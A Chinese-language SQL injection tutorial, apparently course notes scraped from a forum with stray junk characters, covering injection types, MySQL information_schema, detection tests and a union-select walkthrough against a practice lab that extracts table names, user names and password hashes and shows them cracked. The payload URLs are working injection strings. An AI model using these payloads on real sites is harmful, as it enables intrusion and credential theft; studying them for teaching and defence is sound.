|
3 ~2 I& c) @1 D2 B9 p! {# X- B
前言SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 
* b& a) m$ u$ M0 u7 Q! Z% X SQL简介SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统-SQL 语句用于取回和更新数据库中的数据SQL 可与数据库程序协同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。
; I( T, [" u/ W+ F SQL注入SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术SQL注入产生原理对用户输入的参数没有进行严格过滤(如过滤单双引号 尖括号等),就被带到数据库执行,造成了SQL注入。 5 s# c* R2 B0 |
使用了字符串拼接的方式构造SQL语句SQL注入的分类从注入手法分类可以分为:联合查询注入、报错型注入、布尔型注入、延时注入、堆叠注入从数据类型上可以分为:字符型(即输入的输入使用符号进行过滤)、数值型(即输入的输入未使用符号进行过滤)
' w9 N- u- x$ A. D- Y3 j 从注入位置可以分类为:GET数据(提交数据方式为GET,大多存在地址栏)、POST数据(提交数据方式为POST,大多存在输入框中)、HTTP头部(提交数据方式为HTTP头部)、cookie数据(提交数据方式为cookie) - C# {$ o' V$ J7 q" @9 n7 o7 ?
SQL注入的危害分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件)数据库信息泄露网页篡改:登陆后台后发布恶意内容网站挂马 : 当拿到webshell时或者获取到服务器的权限以后,可将一些网页木马挂在服务器上,去攻击别人
$ S5 a$ H6 C8 i+ K" ^- Q8 r: O, u 私自添加系统账号读写文件获取webshellMYSQL数据库数据库A=网站A=数据库用户A表名列名数据数据库B=网站B=数据库用户B数据库C=网站C=数据库用户C必要知识在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 , H) a* \1 n) q4 h0 r2 y' M
数据库中符号"."代表下一级,如xiaodi.user表示xiaodi数据库下的user表名常用参数information_schema.tables:记录所有表名信息的表information_schema.columns:记录所有列名信息的表。 - s8 R7 `7 l1 g. i$ r
table_name:表名column_name:列名table_schema:数据库名user() 查看当前MySQL登录的用户名database() 查看当前使用MySQL数据库名version() 查看当前MySQL版本
6 o. K& S+ g" y+ C9 Y 如何判断注入点如果页面中MySQL报错,证明该页面中存在SQL注入漏洞单引号 and 1=1and 1=2SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常 / v( X! P+ o8 P" s" @
SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误逻辑运算符(或与非)真 且 真 = 真真 且 假 = 假真 或 假 = 真SELECT * FROM users WHERE id=1 真
0 F7 c. @- B. D' N) U 1=1 真1=2 假真且真=真真且假=假SELECT * FROM users WHERE id=1 or 1=1 LIMIT 0,1 正常SELECT * FROM users WHERE id=1 or 1=2 LIMIT 0,1 正常 ( m) W; `- }$ A- w6 o
SQL注入利用  & ?: N! | o, s% T
根据注入位置数据类型将sql注入分类利用order判断字段数order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错?id=1 order by 3--+利用 union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数
4 Y, { _/ f6 d$ G ?id=-1 union select 1,2,3 --+利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名和版本号?id=-1 union select 1,database(),version() --+ 8 c Z8 E9 r7 M9 ~- i. D1 w
利用 union select 联合查询,获取表名?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=已知库名--+
3 Y1 X3 F% j8 [3 Q* z 利用 union select 联合查询,获取字段名?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=已知表名--+
. N+ m% e8 ?$ \0 z/ P 利用 union select 联合查询,获取字段值?id=-1 union select 1,2,group_concat(已知字段名,:已知字段名) from 已知表名--+题目可能存在注入的编号选项有哪几个?
1 ]; @4 {6 `9 D' t. J www.xiaodi8.com/index.php?id=8www.xiaodi8.com/?id=10www.xiaodi8.com/?id=10&x=1www.xiaodi8.com/index.php
4 w6 Z+ B+ ~* i; R( q- m$ _6 `* a) J (post注入)参数有x注入,以下哪个注入测试正确A.www.xiaodi8.com/new/php?y=1 and 1=1&x=2B.www.xiaodi8.com/new/php?y=1&x=2 and 1=1 . J% F; C( X* s" ?) A' G$ l1 [
C.www.xiaodi8.com/new/php?y=1 and 1=1 & x=2 and 1=1D.www.xiaodi8.com/new/php?xx=1 and 1=1&xxx=2 and 1=1 0 i5 i3 K. W' m& F0 e1 M, c+ U
如果参数id存在注入点参数的位置可以互换,使用工具的时候要注意http://www/cnhgs.net/main.php?id53(注入点) and 1=2 &page=1-> http://www/cnhgs.net/main.php?page=1&id53 2 g9 x# d8 }# m/ w3 ?% x; {4 o
(注入点) and 1=2测试演示要选用最舒服的方法测试:SELECT * FROM users WHERE id=1asdsadsad(随便输入) LIMIT 0,1随便输入后对网页有影响说明带入数据库进行查询
4 k- X& z i" ~/ j! m 有注入点,没有影响说明没有带入数据库查询,出现404错误说明对输入检测 没有漏洞#猜解列名数量(字段数)order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错http://219.153.49.228:43230/new_list.php?id=1 order by 4 ) p* Q* ^* `, z/ X7 S% n
#报错猜解准备http://219.153.49.228:43230/new_list.php?id=1 union select 1,2,3,4http://219.153.49.228:43230/new_list.php?id=-1%20union%20%20select%201,2,3,4
1 }+ w6 k, {3 b1 o 或http://219.153.49.228:43230/new_list.php?id=1%20and%201=22222%20union%20%20select%201,2,3,4#信息收集数据库版本:version() N! Q! s. q6 |* K
5.7.22-0ubuntu0.16.04.1数据库名字:database() mozhe_Discuz_StormGroup数据库用户:user() root@localhost操作系统:@@version_compile_os
9 C+ D* P H& e( g* \2 w Linuxhttp://219.153.49.228:43230/new_list.php?id=-1%20union%20select%201,database(),version(),4http://219.153.49.228:43230/new_list.php?id=-1%20union%20select%201,user(),@@version_compile_os,4 + v$ |* X" z! O2 x2 N( ^; U [. w
#查询指定数据库名mozhe_Discuz_StormGroup下的表名信息:http://219.153.49.228:43230/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=mozhe_Discuz_StormGroup
" W+ T1 b+ J5 N' c2 q- y T 查询所有:http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=mozhe_Discuz_StormGroup
! Z8 F5 q7 \8 v# w" x9 w/ Q #查询指定表名StormGroup_member下的列名信息http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=StormGroup_member
Y" B5 G- a5 B2 y) e id,name,password,status#查询指定数据http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
+ L5 T1 O! \4 ]! v, p2 @9 c- ? #猜解多个数据可以采用limit x,1 变动猜解http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
% Y5 ]+ H- `5 ?& ] mozhe356f589a7df439f6f744ff19bb8092c0 MD5解密 dsan13http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1 2 x4 v) o. W7 Y; |" e7 z, Y
mozhea26f03bdd67bc4a815c2c30c6daf0ce3 MD5解密 959003 * ~# P0 q" \5 D; |% s# m
7 P) B6 }1 d( C( H) x
) J O' J3 p! Y' h0 h4 ?, X) F2 I; i+ L( R+ h* i8 O" p7 M
3 ]; c1 M9 Q7 [ p | 
